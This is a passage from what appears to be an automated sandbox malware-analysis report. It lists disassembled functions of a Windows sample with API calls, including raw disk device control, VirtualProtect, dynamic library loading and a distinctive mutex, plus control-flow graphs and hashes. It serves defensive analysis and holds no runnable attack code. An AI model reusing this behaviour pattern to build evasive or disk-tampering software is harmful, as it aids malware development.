                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00403AEE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15synchronizationCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 145 403aee-403b11 CreateMutexW GetLastError 146 403b17 145->146 147 403e7a 145->147 146->147
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateMutexW.KERNELBASE(00000000,00000000,jmuZVxzUSQKZJ,?,?,004044C1,?,?,004046B5), ref: 00403AFB
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,004044C1,?,?,004046B5), ref: 00403B06
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorLastMutex
                                                                                                                                                                      • String ID: jmuZVxzUSQKZJ
                                                                                                                                                                      • API String ID: 1925916568-1615886713
                                                                                                                                                                      • Opcode ID: 97f4a8950689e7290d3bb4c401befd14a09affdda078bd002e7cbc94f52d7475
                                                                                                                                                                      • Instruction ID: 0594eaefbf50b0c8ed9c9a89b72dfe51cd43608961eacb7f94053228cce8ae52
                                                                                                                                                                      • Opcode Fuzzy Hash: 97f4a8950689e7290d3bb4c401befd14a09affdda078bd002e7cbc94f52d7475
                                                                                                                                                                      • Instruction Fuzzy Hash: 32D017B044A304FAE3008F50DE4DB587EA4EB10702F208036E2026A2D4E3F85A45564A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00403072 Relevance: 4.6, APIs: 3, Instructions: 81fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 148 403072-4030ac call 40895b CreateFileA 151 4030b2-4030b4 148->151 152 40880d-408832 DeviceIoControl 148->152 153 40c393-40c396 151->153 154 409e38-409e72 call 40572b call 40bdea call 401314 152->154 155 408838-40883a 152->155 162 409e78-409e7a 154->162 163 40bcde-40bcfa call 40d5c6 154->163 155->153 162->153 166 40bd00-40bd0a 163->166 167 403d94-403d9b call 40acfc 163->167 169 40bd10-40bd2e 166->169 170 40cbf2-40cbf4 166->170 172 403da1-403da3 167->172 173 40c213-40c225 FindCloseChangeNotification 167->173 169->167 170->153 172->153 173->153
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040895B: FindCloseChangeNotification.KERNELBASE(?), ref: 004047E4
                                                                                                                                                                        • Part of subcall function 0040895B: CreateFileA.KERNELBASE(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
                                                                                                                                                                        • Part of subcall function 0040895B: DeviceIoControl.KERNELBASE(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
                                                                                                                                                                      • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,30000080,00000000), ref: 0040309A
                                                                                                                                                                      • DeviceIoControl.KERNELBASE(000001F4,0007405C,00000000,00000000,0046CB60,00000008,?,00000000), ref: 0040882A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ControlCreateDeviceFile$ChangeCloseFindNotification
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 678468364-0
                                                                                                                                                                      • Opcode ID: f40e64bbfca4cb1d53614c19df2d38540b9dd2651b1b1209df5de0d054ee8c58
                                                                                                                                                                      • Instruction ID: a0e7df79db3949de73361334ad2b5bb9c35e9f163141fb49d4e1771874b744e5
                                                                                                                                                                      • Opcode Fuzzy Hash: f40e64bbfca4cb1d53614c19df2d38540b9dd2651b1b1209df5de0d054ee8c58
                                                                                                                                                                      • Instruction Fuzzy Hash: FB317574F50201EBD750DB61FDC2B663364A704B08F10863AE985A62E0F7B8A5029F6F
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00403923 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 23memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 228 403923-40395d LocalAlloc
                                                                                                                                                                      APIs
                                                                                                                                                                      • LocalAlloc.KERNELBASE(00000040,00000000,0040234A,00000000), ref: 0040393C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocLocal
                                                                                                                                                                      • String ID: J#@
                                                                                                                                                                      • API String ID: 3494564517-1245308917
                                                                                                                                                                      • Opcode ID: 19467080a526decec66838046e26b9bb124c136d8231779d530f3707eec05e2f
                                                                                                                                                                      • Instruction ID: 96f7a68253a7caa59ed99d58a6af94cef16a1ec6a7eb00646cb3d5ddcbfd36b8
                                                                                                                                                                      • Opcode Fuzzy Hash: 19467080a526decec66838046e26b9bb124c136d8231779d530f3707eec05e2f
                                                                                                                                                                      • Instruction Fuzzy Hash: B8F09BB8E04208EFCB04DF88D68189DFBF5EB48310F2081A9E948A7340D630AE41DB95
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040B485 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • DeviceIoControl.KERNELBASE(000001F4,0004D004,?,00000000,?,00000000,00000000,00000000), ref: 0040B613
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ControlDevice
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2352790924-0
                                                                                                                                                                      • Opcode ID: 61738139d7721975275484778ac13903525e9063b07367c5274bb8a2ff343b39
                                                                                                                                                                      • Instruction ID: 955b2810cad582ab64bab9f2fc00926d3d94ddd31486b38c3d76b0e6824925a9
                                                                                                                                                                      • Opcode Fuzzy Hash: 61738139d7721975275484778ac13903525e9063b07367c5274bb8a2ff343b39
                                                                                                                                                                      • Instruction Fuzzy Hash: CF514975A00208EFEB04CF98C591B9EBBB1EF94304F2881E9D9006B386C675EF41DB91
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040CCC4 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 52feb7105ccc154861b194a815cc79ff19998883af9ca8cb1e6121868c2185b6
                                                                                                                                                                      • Instruction ID: b0a1cca4c76cdf7f661d8f2e5d02ec42dbbd4e19700d0716b40d81d1197e7497
                                                                                                                                                                      • Opcode Fuzzy Hash: 52feb7105ccc154861b194a815cc79ff19998883af9ca8cb1e6121868c2185b6
                                                                                                                                                                      • Instruction Fuzzy Hash: A6513975A00108EFDB08CF98C594B9EBBB1EB94304F2481A9E9056B3C2C775EF41DB91
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040B453 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • DeviceIoControl.KERNELBASE(000001F4,0004D004,?,00000000,?,00000000,00000000,00000000), ref: 0040B613
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ControlDevice
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2352790924-0
                                                                                                                                                                      • Opcode ID: a18e5d1472410fca8ca710374cb3d90e60d246b078c147aac9527c84940cfddb
                                                                                                                                                                      • Instruction ID: 4278b43e27663415cba18f20cd4f792bdb1a65b806582fdca38cb5ba5a4c1545
                                                                                                                                                                      • Opcode Fuzzy Hash: a18e5d1472410fca8ca710374cb3d90e60d246b078c147aac9527c84940cfddb
                                                                                                                                                                      • Instruction Fuzzy Hash: 5D515B75A04244DFEB08CF98C590BAABBB2EF94304F2881E9D9015B387C675EE41DB91
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004069BB Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,00F1B4B0,?,8B6DF01F,?), ref: 0040A53E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                      • Opcode ID: f586a6cd2cf2dbeeef7eea32102fec9f33a1a5ead16db59af31ba7ceb6fdb687
                                                                                                                                                                      • Instruction ID: df007bf62870af7b74df0dbbe881ec21055e906183b30cdd37e1bfed71aa1605
                                                                                                                                                                      • Opcode Fuzzy Hash: f586a6cd2cf2dbeeef7eea32102fec9f33a1a5ead16db59af31ba7ceb6fdb687
                                                                                                                                                                      • Instruction Fuzzy Hash: 6FE0EC631002087AD7102995DC46FE7765DD7C83A9F508432F705E61D1D63DD95092AE
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040158C Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • DeviceIoControl.KERNELBASE(000001F4,0007405C,00000000,00000000,?,00000008,00405A0B,00000000), ref: 004015AE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ControlDevice
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2352790924-0
                                                                                                                                                                      • Opcode ID: 98b00b6936f3a10efa9a674e71bb74e0dcfe603724a387bcbcad0dffbf1469cf
                                                                                                                                                                      • Instruction ID: 99371d9e342f55f1bbc85bd8c476da0c26e9402948ab4de55a1e54ae49f6dd3b
                                                                                                                                                                      • Opcode Fuzzy Hash: 98b00b6936f3a10efa9a674e71bb74e0dcfe603724a387bcbcad0dffbf1469cf
                                                                                                                                                                      • Instruction Fuzzy Hash: 5BF03076E44204BAE714EBA48C82F6B776DE744704F1081A9B605F61C0EA74AA018BBA
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401352 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00000000,30DBCA36), ref: 0040139E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                      • Opcode ID: 23b8f15108349a094178a66cda89c25afec04ff88fbbd6386f4d34c7ae965c1b
                                                                                                                                                                      • Instruction ID: a34d84a8aa74edc03bf23277289f2878ef58b524965e171c6cbb9bf5a1c13c13
                                                                                                                                                                      • Opcode Fuzzy Hash: 23b8f15108349a094178a66cda89c25afec04ff88fbbd6386f4d34c7ae965c1b
                                                                                                                                                                      • Instruction Fuzzy Hash: 6EF01276C0020CFFCF01AFA5C995CADBF75FF08204B0484AEF90426162DB369A24EB04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040A554 Relevance: 1.5, APIs: 1, Instructions: 28libraryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,00F1B4B0,?,8B6DF01F,?), ref: 0040A53E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                      • Opcode ID: e49d5435ce23adc9ba57d6308fbfbf1d6f88da9ad89fc2230d2c21acb333a382
                                                                                                                                                                      • Instruction ID: 523668955e0e2244aa789caa92f6427d01868abc63ade59164da16a1192ab317
                                                                                                                                                                      • Opcode Fuzzy Hash: e49d5435ce23adc9ba57d6308fbfbf1d6f88da9ad89fc2230d2c21acb333a382
                                                                                                                                                                      • Instruction Fuzzy Hash: A5E0D831004604ADCB11DE58EC8EBDA7298D705311F6498339906FD581CB3CDA85859F
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040135E Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00000000,30DBCA36), ref: 0040139E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                      • Opcode ID: fe7d76ad10c6a880bf5e1dfd2e6ced56b71b8bba822c6e1022d11efbb5b05653
                                                                                                                                                                      • Instruction ID: c3339b175f8b132734afde4b87bcd326777cd273dbfa93b5593f16fc1374389e
                                                                                                                                                                      • Opcode Fuzzy Hash: fe7d76ad10c6a880bf5e1dfd2e6ced56b71b8bba822c6e1022d11efbb5b05653
                                                                                                                                                                      • Instruction Fuzzy Hash: 3DF0F876C0020CBFCF01AFA5D955C9DBFB9FF48200F0084AEB91466162D7369A20AB54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004047DB Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 004047E4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                                      • Opcode ID: 425319291f41f57d8ddd7af97c040428323980b2498e4bb20d22353919547d1b
                                                                                                                                                                      • Instruction ID: c9214f333475bc89ecd2d70b7295bcdaad91083d6e94d736a289ab9c47a493dc
                                                                                                                                                                      • Opcode Fuzzy Hash: 425319291f41f57d8ddd7af97c040428323980b2498e4bb20d22353919547d1b
                                                                                                                                                                      • Instruction Fuzzy Hash: B1B01261D0D14C13CF209B3168041947B29E6D5609B1003DCEC0D201229B13D41047A3
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040930C Relevance: 1.3, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LocalAlloc.KERNELBASE(00000040,?,?,?,00401D6F,?,00000004), ref: 0040931A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocLocal
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3494564517-0
                                                                                                                                                                      • Opcode ID: fbf826679867081d8f65b02a643174af9db75dbf243e506da0a382be49be1460
                                                                                                                                                                      • Instruction ID: c1ed8782e068432966769c92f22ccf836d2bf65aa78af723960710e09a7f87a5
                                                                                                                                                                      • Opcode Fuzzy Hash: fbf826679867081d8f65b02a643174af9db75dbf243e506da0a382be49be1460
                                                                                                                                                                      • Instruction Fuzzy Hash: 6BD0C975A0420CBBCB00DF88E942D59BBECEB09214F004195FE0CDB240D671AE008A95
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040CC5F Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LocalAlloc.KERNELBASE(00000000,00405A18,?,00405A18,00000070,?,?,?,00401322), ref: 0040CC68
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocLocal
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3494564517-0
                                                                                                                                                                      • Opcode ID: f3e2705f243469e8b18360c5bb887dd51615c543d62bfa3a82b819ceace6c8ed
                                                                                                                                                                      • Instruction ID: 4f1da3139afef55b26450597318142262e87c8731a1b2672ee4cfa4472a97f69
                                                                                                                                                                      • Opcode Fuzzy Hash: f3e2705f243469e8b18360c5bb887dd51615c543d62bfa3a82b819ceace6c8ed
                                                                                                                                                                      • Instruction Fuzzy Hash: 7CB0123564430CBBD6006BC8EC05FE5379CE708A1AF000010FA0C86140D6A0B84046A6
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 0040D1F6 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 169libraryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040AEB6,?,?,004046B5), ref: 0040D1FE
                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0040D336
                                                                                                                                                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040D3A8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
